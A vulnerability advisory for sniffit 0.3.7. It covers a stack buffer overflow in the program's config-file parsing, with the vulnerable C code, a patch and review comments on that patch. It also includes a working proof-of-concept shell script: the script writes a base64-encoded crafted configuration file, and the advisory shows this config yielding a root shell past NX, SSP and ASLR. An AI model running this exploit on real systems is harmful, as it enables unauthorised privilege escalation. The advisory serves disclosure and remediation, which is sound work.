For example, the sniffit is available on Ubuntu 14.04.1 LTS and prior. \n \n \n \nVulnerability \n \nThe vulnerability is caused due to incorrect implementation of the functions clean_filename() and clean_string(). These functions suffer from a stack buffer overflow. \n \nThe bug appears in file sn_cfgfile.c on the following functions: \n \nchar *clean_string (char *string) { \nchar help[20]; \nint i, j; \nj=0; \nfor (i=0;i<strlen(string);i++) { \nif( (isalnum(string[i]))||(string[i]=='.') ) { \nhelp[j]=string[i]; \nhelp[j+1]=0; \n} \nj++; \n} \nstrcpy(string, help); \nreturn string; \n} \n \nchar *clean_filename (char *string) { \nchar help[20]; \nint i, j; \nj=0; \nfor (i=0;i<strlen(string);i++) { \nif( !(iscntrl(string[i])) && !(isspace(string[i])) ) { \nhelp[j]=string[i]; \nhelp[j+1]=0; \n} \nj++; \n} \nstrcpy(string, help); \nreturn string; \n} \n \n \n \n \nExploit (PoC) \n \nI have built an exploit to bypass the three most popular protections techniques: Non-eXecutable bit NX, Stack Smashing Protector SSP and Address Space Layout Randomisation ASLR. The exploit finally obtains a root shell. The exploit was successfully tested with Ubuntu 14.04.1 LTS (trusty) with kernel 3.13.0-32-generic (x86_64) fully updated. \n \nThe sniffit exploit is a shell script which will creates a specially-crafted configuration file \"exploit-sniffit-0.3.7-shell.cfg\". Passing this configuration file to sniffit through the \"-c\" option we will obtain a root shell. 
\n \n---- start exploit-sniffit-0.3.7-shell.sh exploit ---- \n \ncfgfile=' \nbG9nZmlsZSAvL2Jpbi9zaApsb2dmaWxlIIiIiIiIiIiImZmZmZmZmZmqqqqqqqqqqgYGBgYGBgYG \nQUFBQUFBQUEHBwcHBwcHB0NDQ0NDQ0NDRERERERERERFRUVFRUVFRUZGRkZGRkZGR0dHR0dHR0dJ \nP0AGBgYGBiH8YAYGBgYGKzxABgYGBgYh/GAGBgYGBtWbQAYGBgYGCkV4cGxvaXQgYnkgSGVjdG9y \nIE1hcmNvIDxobWFyY29AaG1hcmNvLm9yZz4KaHR0cDovL2htYXJjby5vcmcK' \n \necho \"\" \necho \"-----------------------=======-------------------------\" \necho \"----------------=======================----------------\" \necho \"\" \necho \" Author: Hector Marco-Gisbert <hmarco@hmarco.org>\" \necho \" Website: http://hmarco.org\" \necho \" Comment: Exploit for sniffit <= 0.3.7 (root shell)\" \necho \"\" \necho \"----------------=======================----------------\" \necho \"-----------------------=======-------------------------\" \necho \"\" \n \necho \"[+] Creating crafted configuration file for sniffit ...\" \necho \"${cfgfile}\" | base64 -d > exploit-sniffit-0.3.7-shell.cfg \necho -e \"\\n[+] File exploit-sniffit-0.3.7-shell.cfg successfully created !\" \n \necho \"\" \necho \"[+] Help:\" \necho \" If your sniffit is installed with the Set-User-ID then execute:\" \necho \" $ sniffit -c exploit-sniffit-0.3.7-shell.cfg\" \necho \"\" \necho \" If your are allowed to to execute the sniffit with sudo then execute:\" \necho \" $ sudo sniffit -c exploit-sniffit-0.3.7-shell.cfg\" \necho \"\" \n \n---- end exploit-sniffit-0.3.7-shell.sh exploit ---- \n \n \nObtaining a root shell: \n \nbox@upv.es:~$ id \nuid=1000(box) gid=1000(box) groups=1000(box) \nbox@upv.es:~$ sniffit -c exploit-sniffit-shell.cfg \n# \n# id \nuid=1000(box) gid=1000(box) euid=0(root) groups=1000(box) \n \n \nFIX \n \nThe following is a simple patch which fixes the bug. 
Patch for sniffit 0.3.7: \n \ndiff -Nurp sniffit-0.3.7.beta/sn_cfgfile.c sniffit-0.3.7.beta-mod/sn_cfgfile.c \n--- sniffit-0.3.7.beta/sn_cfgfile.c 2014-10-22 19:29:03.000000000 +0200 \n+++ sniffit-0.3.7.beta-mod/sn_cfgfile.c 2014-10-22 19:29:12.244971893 +0200 \n@@ -119,6 +119,11 @@ char *clean_string (char *string) \nchar help[20]; \nint i, j; \n \n+if(strlen(string) >= 20){ \n+ fprintf(stderr, \"Error: String too long [%s]\\n\", string); \n+ exit(-1); \n+} \n+ \nj=0; \nfor(i=0;i<strlen(string);i++) \n{ \n@@ -138,6 +143,11 @@ char *clean_filename (char *string) \nchar help[20]; \nint i, j; \n \n+if(strlen(string) >= 20){ \n+ fprintf(stderr, \"Error: String too long [%s]\\n\", string); \n+ exit(-1); \n+} \n+ \nj=0; \nfor(i=0;i<strlen(string);i++) \n{ \n \n[ sniffit-0.3.7-stack-buffer-overflow.patch ] \n \nPatching sniffit 0.3.7: \n \nwget http://hmarco.org/bugs/patches/sniffit-0.3.7-stack-buffer-overflow.patch \ncd sniffit-0.3.7 \npatch -p1 < ../sniffit-0.3.7-stack-buffer-overflow.patch \n \n \nDiscussion \n \nIt is hard to understand why the sniffit is still under Ubuntu universe repository, which is easily installable via apt-get install sniffit. The functions clean_string and clean_filename contain two stack buffer overflows which allow to bypass the Stack Smashing Protector (SSP) very easy and build a sequence of ROP gadgets which finally obtains a root shell. \n \nOn the other hand, it seems that the code of sniffit is no longer maintained, and may contain additional security issues. Therefore, it is very recommend to not use the sniffit at all for the sake of your security. \n \nHector Marco - http://hmarco.org \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/129292/sniffit-escalate.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
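Review bot: In the first hunk (clean_string), the new guard hard-codes the bound as `strlen(string) >= 20`, repeating the size from `char help[20];` two lines above it. Writing the check as `strlen(string) >= sizeof(help)` keeps the guard tied to the buffer if the array size is ever changed. The error path also echoes the rejected string to stderr and calls `exit(-1)`; a comment that the program aborts on an over-long configuration value would help callers of this function.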
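Review bot: In the second hunk (clean_filename), the length guard prevents the write past `help[20]`, but the unchanged loop that follows it (`j=0; for(i=0;i<strlen(string);i++)`) is left as in the function listing earlier in the advisory, where `j++` runs even for characters that are filtered out. That leaves gaps in `help` that are never written, and if the first character is filtered, `help[0]` is uninitialised when `strcpy(string, help)` reads it. Suggest initialising the buffer (`char help[20] = {0};`) and advancing `j` only when a character is copied; the same applies to clean_string.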